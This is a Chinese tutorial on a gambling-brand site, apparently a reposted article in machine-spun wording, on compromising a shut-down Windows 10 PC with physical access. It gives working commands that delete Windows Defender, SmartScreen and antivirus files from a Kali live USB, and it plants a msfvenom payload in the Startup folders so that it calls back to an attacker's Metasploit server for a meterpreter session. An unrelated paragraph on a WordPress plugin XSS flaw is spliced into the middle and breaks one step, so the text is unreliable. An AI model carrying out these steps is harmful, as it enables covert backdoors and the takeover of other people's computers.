入侵win10(下)–渗入体系 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

入侵win10(下)–渗入体系

申博_安全防护 申博 99次浏览 未收录 0个评论

进击者在长途私有效劳器上设置装备摆设完metasploit,创建了自动化资本剧本和生成了简朴地payload以后,只需能够或许物理打仗他人的电脑几分钟,他就能够或许长途掌握他人的电脑了,纵然电脑已关机也杯水车薪。

若是你还不太邃晓,请务必参考我的上一篇文章:设置live USB和payload USB。否则,你能够会有些蒙圈,不知道我下面会说到的两个USB从何而来。

完成上一篇文章中的一系列操纵以后,这篇文章将继承解说怎样完成接下来的进击环节。两个U盘都要插进去到已封闭的目的体系中,确保封闭了Windows defender和其他平安软件,而且payload会被生存在准确的地位上。

跟之前一样,不论你是白帽子,渗入测试者,平安研究者,或许只是一个一般的windows10用户,在本文的文末,我们将会议论一些防备性的步伐。

Step 1运用live USB启动目的装备

因为在本次进击中,须要用到两个USB端口,以是若是目的装备只要一个USB口的话,你能够须要带一个USB hub,如许就能够或许衔接live USB和payload USB两个U盘了。

当目的体系完整关机以后,一切衔接到电脑的U盘和外设都应该弹出。此时我们会将运用Ethcer东西制造的live USB插进去到win10目的电脑中。

在电脑启动过程当中,要进入启动管理器,须要按F12,F10,或许是Fn+F2,也多是其他键组合。因为分歧的电脑制造商处置惩罚BootLoader的要领分歧,因而没法肯定的说就是哪两个键来启动BootLoader,人人依据本身的个人电脑上网查查启动BootLoader快捷键。下图就是一个典范的启动管理器界面,显现了启动选项,不外目的电脑的启动管理器能够并不是长如许。

挑选“USB boot”选项。

然后,kali(或许不论是其他的甚么Linux版本)会弹出一个上岸窗口,默许用户名root,暗码toor。

Step2 装置Windows卷

大多数电脑的驱动器名(或许是卷名),能够叫做Windows或Windows10。大多数体系只要一个内部硬盘驱动器,因而不难肯定卷名。我们须要记着卷的名字,在教程的背面我们会用到它。

双击位于kali桌面上的驱动器来装置Windows卷。装置完以后,我们就能够或许接见硬盘上的文件和目次了。kali管理器会自动弹出并显现硬盘上的内容。鄙人面的例子中,能够看到“Users”和“Files”目次是完整能够接见的。

入侵win10(下)--渗入体系

Step3 插进去payload USB

接下来,将payload USB插进去到目的盘算机中,桌面上会涌现一个新的驱动器,双击它来装置,并记下文件地址栏中的卷名。鄙人一步中,我们要用到这个卷名。

Step4 禁用盘算机防备

下一步,封闭Windows Defender,Smartscreen和杀毒软件,这个是可选项。禁用盘算机的防备体系并不会损坏操纵体系,也不会再重启时形成致命的毛病。但应用顺序托盘中少了杀毒软件的图标能够会引起用户的疑心。完成这些操纵后,去搜检Windows defender设置也能够让用户和IT专业人员注意到某些平安题目。

我们也能够挑选一种入侵行动不那末显着的要领,好比DNS进击,这让进击者能够或许举行收集垂纶进击,而且只涉及到修正单个的文本文件。在本篇文章中,我将会展现关于关机的电脑会形成多大的损伤。

禁用Windows Defender

Windows defender是Windows操纵体系自带的防病毒和消灭歹意软件的组件。该组件包罗许多的平安功用,好比及时的平安署理,能够监控操纵体系中对照经常使用的地位,检测它们是不是发作转变,一般这些地位轻易被进击者改动。

USB和硬盘会自动挂载在/media/username/目次下。我们能够运用find敕令来查找包罗Windows defender文件的目次。翻开终端,输入以下敕令:

find /media/root/ -type d -iname *Windows\ Defender*

-type d参数意义是只查找目次,-iname参数透露表现疏忽大小写,以是这条敕令会找到名为“Windows Defender”,“windows defender”或许是“WiNdOws dEfEnDeRs”的目次。前后两个通配符*透露表现查找一切包罗Windows defender字符的目次,不论该字符是在目次的开首,末端照样中心。

从上图中能够看到,敕令实行完毕后,查找到6个包罗Windows defender的目次。运用下面这条敕令能够删除这些目次:

find /media/root/ -type d -iname *Windows\ Defender* -exec rm -rf {} \;

这条敕令比上一条敕令多了-exec rm -fr {}\,意义就是找到目次后自动删除。

实行完以后,再运转第一条敕令,就应该找不到包罗Windows defender目次了。

禁用Windows smartscreen

smartscreen是微软开辟的平安层。它作为“防歹意软件效劳”历程在背景运转,并扫描应用顺序和文件来查找微软数据库中符号的歹意软件。纵然禁用了Windows defender,smartscreen照样能够或许识别出歹意的payload并举行断绝。

移除smartscreen,运用以下敕令:

WordPress Slimstat插件存储型XSS漏洞

Slimstat 是WordPress的一个插件,目前安装量已经超过10万,该插件允许网站收集分析数据。该插件会追踪浏览器和操作系统的特定信息,并利用网页访问来优化网站分析技术。 研究人员发现Slimstat插件的管理员dashboard存在非授权的存储型XSS漏洞。该漏洞的利用等级为容易,可以远程利用。版本号低于4.8.1的插件都该漏洞的影响,4.8.1版本中修复了该漏洞。 概述 该漏洞允许访问者在插件的access log功能中注入任意JS代码,access log功能在插件的access log和登陆后的默认页面admin dashboard index都可见。 Admin dashboard index 使用access log,就可以看到用户访问网站的详细情况,包括ip地址、使用的操作系统、使用的浏览器和浏览器安装的插件等。客户端脚本可以对客户端的信息进行指纹操作,然后执行到插件的请求以给出自己的属性。 恶意用户可以假装浏览器有某个插件来伪造分析请求,以在插件access log中注入任意代码。这在管理员登陆后就会自行。 技术细节 插件的期望值是默认支持的浏览器插件,比如pdfviewer, flash ,java。 插件的特征会使用 strip_tags php方法来进行处理,移除原始插件值的标签。 在查看access log记录的细节时,其中一个细节是安装的插件的图片,

find /media/root/ -iname *smartscreen.exe* -exec rm -rf {} \;

如许,一切包罗smartscreen.exe的文件和目次都被删除。

禁用第三方平安软件(杀毒软件)

avast是一款异常优异的杀毒软件,适用于各个平台,被认为是top5的杀毒软件,以是为了演示,我已在目的盘算机上装置了这款杀软。

固然,我们照样要删除一切包罗avast的目次和文件,运用下面这条敕令:

find /media/root/ -iname *avast* -exec rm -rf {} \;

若是不知道目的盘算机运用了甚么杀软,能够手动阅读“ProgramData”和“Program Files”目次,或许运用find敕令来遍历。

find /media/root/ -iname *SearchTermHere*

如今,一切的杀软顺序都已目的盘算机上消灭了,此时这个电脑异常不平安,任何的payload都能够进击它。

Step5 将payload生存到自启动文件夹

Windows有一个自启动文件夹,该文件夹里的顺序都会在开机登录进体系时自启动,这类做法是为了轻易,用户能够随时将正当顺序的快捷方式(如阅读器,Word,播放器等)和剧本等拖入到该文件夹中。

进击一切用户

有两个自启动目次能够用来自动实行payload,要想运转payload进击盘算机中的一切用户,payload USB中的这个“security.exe”payload须要寄存鄙人面的这个Windows目次中:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

下面的cp敕令能够复制payload USB中的msfvenom payload到“All Users”的自启动目次中。

cp /media/root/USB#2 VOLUME NAME/Windows\ Security.exe /media/root/WINDOWS VOLUME NAME/ProgramData/Microsoft/Windows/Start\ Menu/Programs/StartUp/

上面敕令中的USB2和Windows卷名须要依据你本身的实际情况举行修正。ls敕令检察目次下的文件,以确保security.exe这个payload是不是胜利复制。

进击一个用户

若是目的是装备上的单个用户,那末进击者能够会运用下面的启动文件夹:

C:\Users\TARGET USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

下面的敕令用来复制payload到目的用户的启动文件夹中,如许就只会对这个用户形成影响:

cp /media/root/USB#2 VOLUME NAME/Windows\ Security.exe /media/root/Users\TARGET USERNAME/AppData/Roaming/Microsoft/Windows/Start\ Menu/Programs/Startup/

Step6 卸载Windows卷

上面那些步调就是关于怎样删除防病毒软件和插进去msfvenom payload。在kali关机之前,手动卸载Windows卷也是异常重要的。在测试此次进击过程当中,我发明当我没有卸载Windows卷就强迫关机时,有时候会致使卷没法生存对硬盘驱动的修正(也就是关机后,msfvenom没有准确的生存到卷中)。

要准确的卸载Windows卷,右键单击这个驱动器,在弹出的菜单栏中挑选卸载卷。

Windows卷一般卸载后,关掉live USB,拿走U盘,然后脱离盘算机,就像甚么都没发作一样,此时进击已完成。

Step7 实行后渗入操纵

当目的用户开启目的盘算机后,位于启动文件夹中的msfvenom payload会自动运转,而且回连到进击者的效劳器上(固然了,目的盘算机须要联网)。下图能够看到已竖立了一个新的衔接:

目的盘算机只需一起动,它就会实验的去衔接运转着metasploit的VPS。检察已竖立的衔接,在终端中输入sessions便可:

当被入侵盘算机胜利衔接到metasploit VPS时,会自动分派一个ID号。要衔接新创建的会话,只需输入-i参数便可:

sessions -i 1

入侵win10(下)--渗入体系

能够看到创建了一个新的meterpreter衔接,如许进击者就能够或许直接与被入侵的主机举行交互了。在我们这个入侵win10的后续系列文章中,我会讲到一些异常不错的后渗入手艺,以是人人能够延续存眷这个系列。

怎样防备硬盘进击

当谈到防备此类进击时,虽然有时候好像很难防备,但有几点防备步伐照样不错的。

启动BitLocker。这是微软供应的一种硬盘加密手艺,启用了这个以后,本文中所演示的进击就很难胜利实行了。但是并没有甚么卵用,之前已有人写过文章怎样绕过BitLocker加密了。以是它并不是十拿九稳。

运用veracrypt软件。veracrypt是一个跨平台的加密软件,支撑通盘加密。想要越发深切相识veracrypt,请接见Lifehacker。

末了一点,不要运用Windows操纵体系。Windows正本就不是一个平安的操纵体系。MacOS和基于Debain的操纵体系默许供应了更优异的硬盘加密要领。若是你的电脑物理平安存在题目,那末你能够斟酌换操纵体系了。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明入侵win10(下)–渗入体系
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址